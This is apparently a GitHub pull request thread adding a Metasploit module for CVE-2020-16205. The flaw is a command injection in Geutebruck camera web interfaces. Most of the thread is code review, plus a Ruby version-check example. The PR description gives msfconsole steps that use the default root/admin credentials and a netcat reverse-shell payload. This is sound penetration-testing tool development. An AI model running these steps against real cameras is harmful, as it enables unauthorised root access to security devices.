Add CVE-2020-16205 exploit for Geutebruck G-CAM #13986
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
Removing documentation tag for now, however the documentation will need updating from my quick look over it as it does not completely follow the expected standards. Shouldn't be too hard to fix it up though, thanks for adding this in @ddouhine!
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems.
Please also run
thx @gwillcox-r7 and @bcoles for reviewing this PR and for your help 👍
Np, here to help :)
@ddouhine Reviewed the PCAP that you sent to the msfdev email account and it appears to be good, can see no errors with what you have sent there and everything matches what was shown in the module overview. Happy to consider this module as tested based on this info. I will likely be making some more comments shortly for some issues that I can't fix myself, then will be applying some fixes to your code to fix up some of the issues that @bcoles mentioned as well as some other issues re: spelling and grammar that I noticed whilst reviewing this PR.
it should be better now :)
or now... (forgot the msftidy_docs just before)
Co-authored-by: bcoles <bcoles@gmail.com>
Fixed rubocop offenses / msftidy warnings and added @bcoles enhancements.
e84b29b to 959689d
@ddouhine Just realized your branch is way behind the latest updates for Metasploit, so the last update just rebased your branch against
…on vulnerability with no chance of crashing the host
documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
… Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work
…sh and to also include the actual versions of the products that were affected in addition to the firmware versions. This prevents people from having to read the documentation to find affected targets
…to add in missing information about affected parameters
@ddouhine Alright should just be two more things to complete before we can test this out: the documentation as mentioned above, and then the improvements to the version check so that it uses
with the updated check using `Gem::Version`
Improvements implemented in the version check @gwillcox-r7! And I've updated the documentation with the device name, device edition and firmware version. Nothing to add for me on the documentation, seems complete to me.
@ddouhine Gah so close man, but unfortunately with your new Otherwise the new
Oops sorry, don't know what this "return true" was doing there.
Check seems ok. With 1.12.0.27 (not vulnerable):
With 1.12.14.5 (vulnerable):
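The version check discussed in this thread, as an added example rather than the module's own code: it parses a firmware version with `Gem::Version` (so that 1.12.14.5 sorts after 1.12.9.1, which plain string comparison gets wrong), returns an Unknown result when no version can be read, and treats only 1.12.14.5 as affected because the thread confirms that version as vulnerable and 1.12.0.27 as not. The affected-version table and the banner strings are constructed stand-ins, not values from the module.

```ruby
require 'rubygems' # provides Gem::Version in any stock Ruby

# Constructed stand-in for the module's affected-version list: the thread
# confirms only that 1.12.14.5 is vulnerable and 1.12.0.27 is not.
VULNERABLE_VERSIONS = %w[1.12.14.5].map { |v| Gem::Version.new(v) }.freeze

# Extract a dotted firmware version from a banner string such as
# "Firmware Version: 1.12.14.5". Returns nil when nothing parseable is
# present so the caller can report Unknown rather than a false "safe".
def parse_firmware_version(banner)
  return nil if banner.nil?
  match = banner.match(/\b(\d+(?:\.\d+){1,3})\b/)
  return nil unless match && Gem::Version.correct?(match[1])
  Gem::Version.new(match[1])
end

# True when version string a is newer than b, compared numerically per
# component. String comparison would put "1.12.14.5" below "1.12.9.1".
def newer_firmware?(a, b)
  Gem::Version.new(a) > Gem::Version.new(b)
end

# Classify a target the way a module check method does. Three outcomes:
# :vulnerable (version is in the affected list), :safe (a version was
# read but is not affected) and :unknown (no version could be read, for
# example because the connection failed), mirroring the Unknown status
# this PR added instead of silently reporting a target as safe.
def firmware_check(banner)
  version = parse_firmware_version(banner)
  return :unknown if version.nil?
  VULNERABLE_VERSIONS.include?(version) ? :vulnerable : :safe
end

if __FILE__ == $PROGRAM_NAME
  # Constructed banners standing in for what a real probe would return.
  ['Firmware Version: 1.12.14.5', 'Firmware Version: 1.12.0.27', nil].each do |b|
    puts "#{b.inspect} => #{firmware_check(b)}"
  end
end
```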
Code fix is still incorrect, I'll rewrite this so long. Give me a sec.
Really?? Feel so dumb... Well, thx for your help in advance
Don't feel bad, happens to all of us sometimes 👍 I think you'll get it pretty quick after I push the patch up. Edit: Actually the real issue was something else entirely. I'll explain after I patch this up. Sorry for the confusion 😓
… status if the connection fails
Ok so last commit should alter the logic a bit so that your
Last thing that may be helpful for this exploit is to include the AutoCheck mixin which will ensure that the exploit only attempts to trigger the bug if the target is determined to be vulnerable via the I'll add this in so long, should give this a little more flexibility and assurance for pentesters 😄
…e attempting to exploit them.
Hmm now check is not working for me :/
I should be tired. Will have a look later.
@ddouhine Gah that was my bad. I messed that up, will fix it now.
…s I tried calling the nonexistent method .true?
Ok that should fix it. Sorry I was trying to simplify the logic by calling something similar to
And a fix for the fix ;) I guess now everything will work as intended!
@ddouhine Whoops sorry, good spot!
Do you need anything else from me?
@ddouhine I think there is one minor thing with the documentation but otherwise this is good to land. Let me fix that up so long and get this landed into the framework 👍
…ame and password could be something other than root/admin
@ddouhine Merged, thanks a ton for your patience on the edits and for submitting this PR!
Release Notes: New module
@ddouhine, if you still have the pcap for this scenario, can you please share it?
This exploits a simple OS command injection (CVE-2020-16205) in the web interface of the Geutebruck G-Cam and G-Code products.
Many brands use the same firmware:
Unfortunately I haven't been able to test this module against any of them except Geutebruck.
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 and a blogpost about the issue: https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/
A web server runs on the product to offer video streaming and configuration management, and the web interface has an OS command injection vulnerability in the `/uapi-cgi/admin/testaction.cgi` page used for the TCP/IP configuration. The setup pages need authentication to be reached, so it's not a CVSS 10, but the credentials are not randomized (root/admin by default).
When exploited the vulnerability gives you root access.
The following firmware versions are vulnerable:
I've tested it with the 1.12.14.5 firmware only and I've provided you the PCAP by mail.
PS: it's my first module in many years so I guess a few things will be incorrect/missing.
Verification
```
msfconsole
use exploit/linux/http/geutebruck_testaction_exec
set httpusername root
set httppassword admin
set lhost 192.168.14.1
set rhosts 192.168.14.58
set payload cmd/unix/reverse_netcat_gaping
check
exploit
```
Demonstration
check against a vulnerable target (1.12.14.5):
![Screenshot 2020-08-12 at 10 54 34](https://user-images.githubusercontent.com/4519330/89995808-4e91d880-dc8a-11ea-8422-9d8448194601.png)
check against a non vulnerable target (1.12.0.27):
![Screenshot 2020-08-12 at 10 54 44](https://user-images.githubusercontent.com/4519330/89997983-38d1e280-dc8d-11ea-9ed2-c806b7057083.png)
exploitation: